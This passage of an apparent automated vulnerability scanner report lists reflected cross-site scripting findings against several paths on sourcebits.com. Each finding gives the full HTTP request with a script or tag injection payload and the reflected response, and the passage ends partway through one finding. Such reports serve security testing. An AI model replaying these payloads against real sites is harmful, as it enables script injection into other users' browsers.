GET /design5136e<script>alert(1)</script>563db75cdd7 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/design5136e<script>alert(1)</script>563db75cdd7</h2>
...[SNIP]...

1.58. http://www.sourcebits.com/design [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/design

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 39758<script>alert(1)</script>d25c3fc3c1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /design?39758<script>alert(1)</script>d25c3fc3c1b=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:26 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/design?39758<script>alert(1)</script>d25c3fc3c1b=1</h2>
...[SNIP]...

1.59. http://www.sourcebits.com/facebook [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/facebook

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1c331<script>alert(1)</script>f79b1dbde0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook1c331<script>alert(1)</script>f79b1dbde0a HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:56:01 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/facebook1c331<script>alert(1)</script>f79b1dbde0a</h2>
...[SNIP]...

1.60. http://www.sourcebits.com/facebook [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/facebook

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d791e<script>alert(1)</script>276f2c16505 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook?d791e<script>alert(1)</script>276f2c16505=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/facebook?d791e<script>alert(1)</script>276f2c16505=1</h2>
...[SNIP]...

1.61. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.sourcebits.com
Path:	/images/logo/favicon.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a809<a>9d5ca3a2f33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images8a809<a>9d5ca3a2f33/logo/favicon.png?1288800918 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7; __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:50:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/images8a809<a>9d5ca3a2f33/logo/favicon.png?1288800918</h2>
...[SNIP]...

1.62. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.sourcebits.com
Path:	/images/logo/favicon.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c21a0"><a>fe177bbe1ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesc21a0"><a>fe177bbe1ed/logo/favicon.png?1288800918 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7; __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:49:59 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/imagesc21a0"><a>fe177bbe1ed/logo/favicon.png?1288800918" />
...[SNIP]...

1.63. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.sourcebits.com
Path:	/images/logo/favicon.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3ebfd<a>66173ae33c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/logo3ebfd<a>66173ae33c1/favicon.png?1288800918 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7; __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:50:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/images/logo3ebfd<a>66173ae33c1/favicon.png?1288800918</h2>
...[SNIP]...

1.64. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.sourcebits.com
Path:	/images/logo/favicon.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14bb0"><a>df6e3209a20 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/logo14bb0"><a>df6e3209a20/favicon.png?1288800918 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7; __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:50:40 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/images/logo14bb0"><a>df6e3209a20/favicon.png?1288800918" />
...[SNIP]...

1.65. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.sourcebits.com
Path:	/images/logo/favicon.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a22fa"><a>6d7cd730918 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/logo/favicon.pnga22fa"><a>6d7cd730918?1288800918 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7; __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:13 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/images/logo/favicon.pnga22fa"><a>6d7cd730918?1288800918" />
...[SNIP]...

1.66. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.sourcebits.com
Path:	/images/logo/favicon.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 14834<a>922a4dbb0ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/logo/favicon.png14834<a>922a4dbb0ba?1288800918 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7; __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/images/logo/favicon.png14834<a>922a4dbb0ba?1288800918</h2>
...[SNIP]...

1.67. http://www.sourcebits.com/ipad [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/ipad

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b4c8<script>alert(1)</script>34e5d6250df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ipad9b4c8<script>alert(1)</script>34e5d6250df HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/ipad9b4c8<script>alert(1)</script>34e5d6250df</h2>
...[SNIP]...

1.68. http://www.sourcebits.com/ipad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/ipad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a704d<script>alert(1)</script>029b51e6ee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ipad?a704d<script>alert(1)</script>029b51e6ee8=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:25 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/ipad?a704d<script>alert(1)</script>029b51e6ee8=1</h2>
...[SNIP]...

1.69. http://www.sourcebits.com/iphone [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/iphone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 96988<script>alert(1)</script>b6d9a28df5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iphone96988<script>alert(1)</script>b6d9a28df5a HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:51 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/iphone96988<script>alert(1)</script>b6d9a28df5a</h2>
...[SNIP]...

1.70. http://www.sourcebits.com/iphone [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/iphone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32af5<script>alert(1)</script>01277e9ffb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iphone?32af5<script>alert(1)</script>01277e9ffb7=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:19 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/iphone?32af5<script>alert(1)</script>01277e9ffb7=1</h2>
...[SNIP]...

1.71. http://www.sourcebits.com/js/blogger.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/blogger.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0bcd<script>alert(1)</script>3024933c577 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

